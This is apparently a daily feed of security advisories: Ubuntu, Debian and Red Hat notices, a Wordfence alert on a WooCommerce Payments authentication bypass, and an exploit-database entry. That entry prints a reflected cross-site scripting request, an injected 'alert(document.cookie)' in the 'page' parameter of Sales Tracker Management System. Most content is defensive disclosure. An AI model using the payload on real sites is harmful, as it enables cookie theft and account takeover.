Ubuntu Security Notice 5969-1 - It was discovered that gif2apng contained multiple heap-base overflows. An attacker could potentially exploit this to cause a denial of service.

    =========================================================================Ubuntu Security Notice USN-5969-1March 23, 2023gif2apng vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESMSummary:Several security issues were fixed in gif2apng.Software Description:- gif2apng: tool for converting animated GIF images to APNG formatDetails:It was discovered that gif2apng contained multiple heap-base overflows. Anattacker could potentially exploit this to cause a denial of service (systemcrash). (CVE-2021-45909, CVE-2021-45910, CVE-2021-45911)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:  gif2apng                        1.9+srconly-3ubuntu0.1Ubuntu 18.04 LTS:  gif2apng                        1.9+srconly-2ubuntu0.1Ubuntu 16.04 ESM:  gif2apng                        1.7-3ubuntu0.1~esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5969-1  CVE-2021-45909, CVE-2021-45910, CVE-2021-45911Package Information:  https://launchpad.net/ubuntu/+source/gif2apng/1.9+srconly-3ubuntu0.1  https://launchpad.net/ubuntu/+source/gif2apng/1.9+srconly-2ubuntu0.1

Ubuntu Security Notice USN-5969-1

Red Hat Security Advisory 2023-1448-01 - Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio service mesh project, tailored for installation into an on-premise OpenShift Container Platform installation. This advisory covers container images for the release.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift Service Mesh Containers for 2.3.2 security update  
Advisory ID:       RHSA-2023:1448-01  
Product:           RHOSSM  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1448  
Issue date:        2023-03-23  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2021-46848  
                   CVE-2022-4415 CVE-2022-35737 CVE-2022-40303  
                   CVE-2022-40304 CVE-2022-40897 CVE-2022-41717  
                   CVE-2022-42010 CVE-2022-42011 CVE-2022-42012  
                   CVE-2022-43680 CVE-2022-45061 CVE-2022-47629  
                   CVE-2022-48303 CVE-2023-23916  
====================================================================  
1. Summary:

Red Hat OpenShift Service Mesh Containers for 2.3.2

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat OpenShift Service Mesh is the Red Hat distribution of the Istio  
service mesh project, tailored for installation into an on-premise  
OpenShift Container Platform installation.

This advisory covers container images for the release.

Security Fix(es):

* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OSSM-1330 - Allow specifying secret as pilot server cert when using CertificateAuthority: Custom  
OSSM-2342 - Run OSSM operator on infrastructure nodes  
OSSM-2371 - Kiali in read-only mode still can change the log level of the envoy proxies  
OSSM-2373 - Can't login to Kiali with "Error trying to get OAuth metadata"  
OSSM-2374 - Deleting a SMM also deletes the SMMR in OpenShift Service Mesh  
OSSM-2492 - Default tolerations in SMCP not passed to Jaeger  
OSSM-2493 - Default nodeSelector and tolerations in SMCP not passed to Kiali  
OSSM-3317 - Error: deployment.accessible_namespaces set to ['**']

6. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-42010  
https://access.redhat.com/security/cve/CVE-2022-42011  
https://access.redhat.com/security/cve/CVE-2022-42012  
https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBzBgdzjgjWX9erEAQg+RA//U81YTWP1rgG9WS9tC680BqAEEIPxsu+m  
EYKP0RuNAIRQ2I75GKo3V6NPanherwNzJLOlf4rbfcYH+YtrMWvTDlo+BRZ4vqiK  
+LsWBg79XkcJKq2er7NJ9ZJsz2PYiEHVhUdLmlg5aVvi1AJMSfimVxvNTKPR39LU  
r/dUsF3uThlY3jcaSsix0CiawOtS8pfV9xKx4wUtbI1HoKHOODjRIz34AZEdldP+  
TSxILtPstiAw4LsEWUBPcGd0LSAtA8apMa8c5Hqtr8Sv0EaF1HRqp2jF1JvI/YIF  
3o7nW9POMOCl+6MHHQ5RSHKdGwj8NDtkCwIgGoaMLE4KeTIWyA82V7Scx51Hkcpj  
eBj1bPI7HPwglage6XM/gVJrGy5RucGL7HRQjYa3e+g7az3rtT0cVGdIKUXEiNaF  
t3oBrvQWFCvjpc/9zRdWX48H+S1rPz67enUvpAnMT4/xh4+4A50LZXOD7rzlScy7  
yKw2ZuSqvEd8IQDwNGvL1syS45QVda0DkiWDgJBu0I9JMFAZsklwqE2EHmWtP455  
iTZF+ihoEKNH/OACDLYYYqWqCEhav7YTXcVsoF7jb5fM2cJyfHjdBWnqDhUQTSS1  
5N5uptv3bCSo/fwbvr1SXFUto4Gpt/G2fPHH2pTm2FKg9GRgJRpzQFZyg5L69UDG  
fLr0RtMPl5A²kJ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1448-01

Red Hat Security Advisory 2023-1453-01 - An update is now available for Red Hat OpenShift GitOps 1.6. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:1453-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1453  
Issue date:        2023-03-23  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-1471  
                   CVE-2022-4415 CVE-2022-34174 CVE-2022-40897  
                   CVE-2022-41354 CVE-2022-45061 CVE-2022-48303  
                   CVE-2023-23916  
====================================================================  
1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.6.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* ArgoCD: Authenticated but unauthorized users may enumerate Application  
names via the API (CVE-2022-41354)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167820 - CVE-2022-41354 ArgoCD: Authenticated but unauthorized users may enumerate Application names via the API

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-34174  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41354  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBzBgdzjgjWX9erEAQhjSBAAh7FvU63tYvcvm9mNr5i4LKeWWbC/otaD  
22vtAruUsqWAWLcC2egZMAnYp4lfz0CXyLuz4rQs5rDo5ZCOdREUea57WYrluTkg  
cD99cKAiyO30YRkBw8jgtu4ZBOb60tuv+mYWfJzA9/LprYvL+CVgoUaQ1XqviAXq  
89dUOSIX1Kc/wMsPkMGzWqiF3c9ai5tCIvW2s9yhFumlFFLdKfvU1ZEoXLGjYs3a  
c9CeZlKkhORIQi45197QVDdy/sKW+/aDyojEIUAAw+w8ZHEbNFNQwwwGApHVzOsf  
lul6WYoiwwXXBiFMz6fkjo1SmTQIljI2hbW7qphObs8wXDBWzvIuFR3uDEklJMJu  
jNuflBhhBso7yx6xRVp/CaTdGr1rR1kNGbqQs3QRlj6KgOsZNaUm86GMF1CoUnFt  
0iXMG5gWsn/nJnGor2SgpuJRfMQwjmfp4DO8KIoTWoQ8b7fnLE9jtTerudJiIobk  
U5ysjS66ytAqCILyWCvCsJT+L2jLY4oraAyJAyrYVjrIIcHO6T84OnpvqZaZy1ok  
Q+I2h9pd5iIjbNWbIJBVje0NUFv/arcTDQDA+PLdZ3V+BK7gisnRHsVHRYUmVGa4  
ZNLYDECKEy2CHaSTRlGAwjGoUpO0bZx2uVxyAqoVUDsOUvewgeUP/w7nTdkXX6zh  
iFp64IHstt4=EYJ/  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1453-01

WordPress WooCommerce Payments plugin versions 5.6.1 and below suffer from authentication bypass and privilege escalation vulnerabilities. Details surrounding these issues seem minimal at this point.

**WordPress WooCommerce Payments 5.6.1 Authentication Bypass / Privilege Escalation**

**WordPress WooCommerce Payments 5.6.1 Authentication Bypass / Privilege Escalation**

    Vulnerability allows attackers to impersonate any user and puts as many as 500,000 sites at risk of takeover.PSA: Update Now! Critical Authentication Bypass in WooCommerce Payments Allows Site TakeoverThe Wordfence Threat Intelligence team regularly monitors plugin updates and reviews any indicating that a potential security issue may have been addressed. Today, March 23, 2023, we noticed that the “WooCommerce Payments – Fully Integrated Solution Built and Supported by Woo” plugin updated to version 5.6.2 with a changelog entry marked simply “Security update.”After reviewing the update we determined that it removed vulnerable code that could allow an unauthenticated attacker to impersonate an administrator and completely take over a website without any user interaction or social engineering required.We developed a Proof of Concept and began writing and testing a firewall rule immediately. The rule was released the same day, on March 23, 2023 to Wordfence Premium,  Wordfence Care, and Wordfence Response customers.Regardless of the version of Wordfence you are using, we urge you to update to the latest version of the WooCommerce Payments plugin, which is 5.6.2 as of this writing, immediately. WooCommerce Payments is installed on over 500,000 sites, and this is a critical-severity vulnerability.This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.Vulnerability InformationDescription: Authentication Bypass and Privilege Escalation Affected Plugin: WooCommerce PaymentsPlugin Slug: woocommerce-paymentsPlugin Developer: AutomatticAffected Versions: <= 5.6.1CVE ID: N/ACVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HFully Patched Version: 5.6.2The WooCommerce Payments plugin is a fully integrated payment solution for WooCommerce developed by Automattic. Unfortunately it contained functionality designed to integrate with the WooCommerce Payment Platform that allowed unauthenticated attackers to impersonate any user on the site in some contexts, which could then be used to gain full access to a site’s administrator account.We are withholding additional details at this time to give users time to update.We do not yet know whether this vulnerability was discovered internally by Automattic or reported by an external researcher, and have not yet determined whether it is actively being exploited in the wild.We expect to see large-scale attacks targeting this vulnerability once a proof of concept becomes available to attackers.ConclusionIn today’s PSA we are alerting our user base to a critical-severity vulnerability in WooCommerce Payments, a plugin installed on over 500,000 sites. This vulnerability allows unauthenticated attackers to completely take over a vulnerable site, and we expect to see mass exploitation in the near future. We recommend that all users update to the latest version available, which is 5.6.2 at the time of this writing.If your site has Wordfence Premium, Wordfence Care, or Wordfence Response installed, your site will have received a firewall rule today, March 23, 2023, protecting it against this vulnerability. If your site is running the free version of Wordfence, the rule will become available 30 days from now, on April 22, 2023.If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected. Please help make the WordPress community aware of this issue.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.

WordPress WooCommerce Payments 5.6.1 Authentication Bypass / Privilege Escalation

Red Hat Security Advisory 2023-1454-01 - An update is now available for Red Hat OpenShift GitOps 1.7. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:1454-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1454  
Issue date:        2023-03-23  
CVE Names:         CVE-2020-10735 CVE-2021-28861 CVE-2022-1471  
                   CVE-2022-4415 CVE-2022-34174 CVE-2022-40897  
                   CVE-2022-41354 CVE-2022-45061 CVE-2022-48303  
                   CVE-2023-23916  
====================================================================  
1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* ArgoCD: Authenticated but unauthorized users may enumerate Application  
names via the API (CVE-2022-41354)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167820 - CVE-2022-41354 ArgoCD: Authenticated but unauthorized users may enumerate Application names via the API

5. References:

https://access.redhat.com/security/cve/CVE-2020-10735  
https://access.redhat.com/security/cve/CVE-2021-28861  
https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-34174  
https://access.redhat.com/security/cve/CVE-2022-40897  
https://access.redhat.com/security/cve/CVE-2022-41354  
https://access.redhat.com/security/cve/CVE-2022-45061  
https://access.redhat.com/security/cve/CVE-2022-48303  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBzBVtzjgjWX9erEAQhzXA/9Eq6aEKRFZQk/k1rj2PJ2yNohxZKK0zkl  
5BLVG9bNjsHgOAq2yoOQkdGH9ZqfCh31V5VtBkPRtbVHwM03l2ixG+Nb2EDonn4W  
YMUwBx0+juQPjECzWPwIed8UDN1SbmEcZarsTFZQFkgxuV/OLx7lQcfdunSRMlNv  
hwhvGVjd0b/UWqbtFZV8zg85k4FGdH3Mdl2sEKAAP16QTYx1yWseOBrJalrFYYDg  
9K/9qVol2KXb34MRtre+l4ohxf/rfGzlaw0bvlxQFPUs6mkdKZT7u6nZgayk0wbn  
LVwdLmpA4zbbFGzncRZQ1rWKN0lg+rFODKydKhiy0CkG+sMVcvwgdwg9vShuTdUE  
86KWPcnZzcn3Gh8wJ+ae4GmtjenETv9p7wON8Z85A6cKhfYvKkZfJCquPuN8cIJG  
1f6b8Vdap0rA4nP/GV9KtbzwWDe16qIZTb7mOTtqT7iXgG27zr1ErjnceokntE2g  
Yjbcx/9IWA47TKAfpIDzA91QrhbRX2lEqnQdrfpYfeTx8VnozC48K0j5+fMgDFEp  
OEOnjG74VTLiYgVwPMr63roEToTgUwGkjav/Zl4/yNkUFn25RWSQk3r+z816aBvJ  
6x8CKCc9sjKdUU+1n/1kxC6btQpk2xM3YPoU54yos412kcikfmapGGePASpY5sdK  
8B7lgIl/xhM=Hcu1  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1454-01

Sales Tracker Management System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-1452-01 - An update is now available for Red Hat OpenShift GitOps 1.8. Red Hat Product Security has rated this update as having a security impact of Moderate.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenShift GitOps security update  
Advisory ID:       RHSA-2023:1452-01  
Product:           Red Hat OpenShift GitOps  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1452  
Issue date:        2023-03-23  
CVE Names:         CVE-2022-41354   
=====================================================================

1. Summary:

An update is now available for Red Hat OpenShift GitOps 1.8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* ArgoCD: Authenticated but unauthorized users may enumerate Application  
names via the API (CVE-2022-41354)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2167820 - CVE-2022-41354 ArgoCD: Authenticated but unauthorized users may enumerate Application names via the API

5. References:

https://access.redhat.com/security/cve/CVE-2022-41354  
https://access.redhat.com/security/updates/classification/#moderate

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBzBVtzjgjWX9erEAQi6RQ/+JfxD64NTPljBopSNQSuDFtEBIiohZguZ  
2ydP/fVMGMksww/EPIhyh4gczYdq73hk2+V6P2RaCN87DxfBRpvLLc4x+GqS0bRn  
ZkgaSe0UArP7fiPQu4krszGlFjEwm/bSXBDFcWA1anb8lEvQ+/dUiR/kjWsHjLXZ  
6yU/0OEot4DGuLPvq7Kkj4sZ37/gNAjNIE9Sh46lnDWTD7nxZ1Si1UAJ2uNjfj52  
gUUk5UxQRgg/5wuXucBSeU+IwK+Qh16mUAtAmJLn2eoIsM3kMisq3UL97oszrU32  
J62w6Fu3mxJ1Axfz6hv5V/80W27Lqtkn60DH+UwpB9pvrraEVKWxQd+fM5NhjBnS  
xgERYbDvh3SVMFHphkldFCYu6yOwkCS3uSrrpe/7wVRPmC9V8v0oMAZ9wlhczQs7  
3t/4dfLfLgmWlApdJBEApwXnLWRPTKTverJwHtaHp1hnXO17Olm6XdaxhAwHiXF0  
kXCFWXl3Sq/bb4Zyp6cbAEYdlWAiOA5qw0Hg89iciXXQ7v9eTSRXvH7ddNGFwlnW  
fl7RrM/Dn6zLGsOnz70kZc8QZCy+YyrT+4j3CIiOHity0dlDn+pvTJgtXvgS2LoZ  
zkuvktkhnePFgosSeMRLjPV36NjLD8E2vOuZqec3uooRzQ2afdFDHV6Ewreu2dyk  
PLaxEL0Z8sE=  
=vMuw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1452-01

Debian Linux Security Advisory 5377-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5377-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMarch 23, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-1528 CVE-2023-1529 CVE-2023-1530 CVE-2023-1531                 CVE-2023-1532 CVE-2023-1533 CVE-2023-1534Debian Bug     : 1015367 1033015 1033223Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 111.0.5563.110-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmQcr7UACgkQEMKTtsN8TjbuARAAlS9yYt7wuAEDkYwDu/aDYURZpuzfRsXQAkH1lANruzc/RWXYZOCnpXC+3C3khe5QvqHkv30n6P2gQi5MEnT1HUnxRkhdXdcf3m+W5lJ0RHSmIntUK1CUXXj52mQ5w3GsGan/gfiYJhrVwOTx6/eKNjt5hv6qXd6ku0rEY/J1SOms83a5WnxxJxoeIMKMqqCXJ4MOEEk+F8qGVgrRV+IJjOmvcUAWgeRcZE28xWlv8dVCd3ouzLPE6TH53mwkQXFXiJ6rn3oiIPvu8m/8zLy1wnHbjn1GRDnNd8d7TdQVX5acmDfw/l1SYILvHXNVMlvq6Rg6+rmo/8RmSU7Bhv4bY7DZ0dRZIjqfFflIjYpaCqbBZavy6+gqrzfLcHukE4WzwpI4dejlgPYP/hYqtR0RVeOFHbecukj8LzRJL/bdjOx+lZz/yzn1i+uIekOvk8i41M3tcoGOT0u0xzgWeyqj+nZpBeCRuLCcqUgSaCP6ywAM/gd7kDqwvy1XMj4tp/MV406Byt6Puog2YzgFmD1bz1EpptSODva/sWf755bCBzR63hVsmtzek3KJi0GkSvzfJe5euppnqfV2Et3rxYuaMQv98UUNV56GaJv8b5y5W/q8ujUXKZOrU6sQJobO7UT0vN4D0EHYTvTsCoSri4fv7VIjAhJmiepzpggx+if/xxY~jM-----END PGP SIGNATURE-----

Debian Security Advisory 5377-1

Ubuntu Security Notice 5966-2 - USN-5966-1 fixed vulnerabilities in amanda. Unfortunately it introduced a regression in GNUTAR-based backups. This update reverts all of the changes in amanda until a better fix is provided. Maher Azzouzi discovered an information disclosure vulnerability in the calcsize binary within amanda. calcsize is a suid binary owned by root that could possibly be used by a malicious local attacker to expose sensitive file system information.

=========================================================================  
Ubuntu Security Notice USN-5966-2  
March 23, 2023

amanda regression  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

USN-5966-1 introduced a regression in amanda

Software Description:  
- amanda: Advanced Maryland Automatic Network Disk Archiver (Client)

Details:

USN-5966-1 fixed vulnerabilities in amanda. Unfortunately it introduced  
a regression in GNUTAR-based backups. This update reverts all of the  
changes in amanda until a better fix is provided.

We apologize for the inconvenience.

Original advisory details:

 Maher Azzouzi discovered an information disclosure vulnerability in the  
 calcsize binary within amanda. calcsize is a suid binary owned by root that  
 could possibly be used by a malicious local attacker to expose sensitive  
 file system information. (CVE-2022-37703)

 Maher Azzouzi discovered a privilege escalation vulnerability in the  
 rundump binary within amanda. rundump is a suid binary owned by root that  
 did not perform adequate sanitization of environment variables or  
 commandline options and could possibly be used by a malicious local  
 attacker to escalate privileges. (CVE-2022-37704)

 Maher Azzouzi discovered a privilege escalation vulnerability in the runtar  
 binary within amanda. runtar is a suid binary owned by root that did not  
 perform adequate sanitization of commandline options and could possibly be  
 used by a malicious local attacker to escalate privileges. (CVE-2022-37705)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
  amanda-client                   1:3.5.1-9ubuntu0.2

Ubuntu 22.04 LTS:  
  amanda-client                   1:3.5.1-8ubuntu1.2

Ubuntu 20.04 LTS:  
  amanda-client                   1:3.5.1-2ubuntu0.2

Ubuntu 18.04 LTS:  
  amanda-client                   1:3.5.1-1ubuntu0.2

Ubuntu 16.04 ESM:  
  amanda-client                   1:3.3.6-4.1ubuntu0.1+esm2

Ubuntu 14.04 ESM:  
  amanda-client                   1:3.3.3-2ubuntu1.1+esm2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5966-2  
  https://ubuntu.com/security/notices/USN-5966-1  
  https://launchpad.net/bugs/2012536

Package Information:  
  https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-9ubuntu0.2  
  https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-8ubuntu1.2  
  https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-2ubuntu0.2  
  https://launchpad.net/ubuntu/+source/amanda/1:3.5.1-1ubuntu0.2

Ubuntu Security Notice USN-5966-2

Red Hat Security Advisory 2023-1440-01 - OpenSSL is a toolkit that implements the Secure Sockets Layer and Transport Layer Security protocols, as well as a full-strength general-purpose cryptography library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: openssl security update  
Advisory ID:       RHSA-2023:1440-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1440  
Issue date:        2023-03-23  
CVE Names:         CVE-2023-0286  
====================================================================  
1. Summary:

An update for openssl is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and  
Transport Layer Security (TLS) protocols, as well as a full-strength  
general-purpose cryptography library.

Security Fix(es):

* openssl: X.400 address type confusion in X.509 GeneralName  
(CVE-2023-0286)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

For the update to take effect, all services linked to the OpenSSL library  
must be restarted, or the system rebooted.

5. Bugs fixed (https://bugzilla.redhat.com/):

2164440 - CVE-2023-0286 openssl: X.400 address type confusion in X.509 GeneralName

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
openssl-1.1.1g-18.el8_4.src.rpm

aarch64:  
openssl-1.1.1g-18.el8_4.aarch64.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.aarch64.rpm  
openssl-debugsource-1.1.1g-18.el8_4.aarch64.rpm  
openssl-devel-1.1.1g-18.el8_4.aarch64.rpm  
openssl-libs-1.1.1g-18.el8_4.aarch64.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.aarch64.rpm  
openssl-perl-1.1.1g-18.el8_4.aarch64.rpm

ppc64le:  
openssl-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-debuginfo-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-debugsource-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-devel-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-libs-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-libs-debuginfo-1.1.1g-18.el8_4.ppc64le.rpm  
openssl-perl-1.1.1g-18.el8_4.ppc64le.rpm

s390x:  
openssl-1.1.1g-18.el8_4.s390x.rpm  
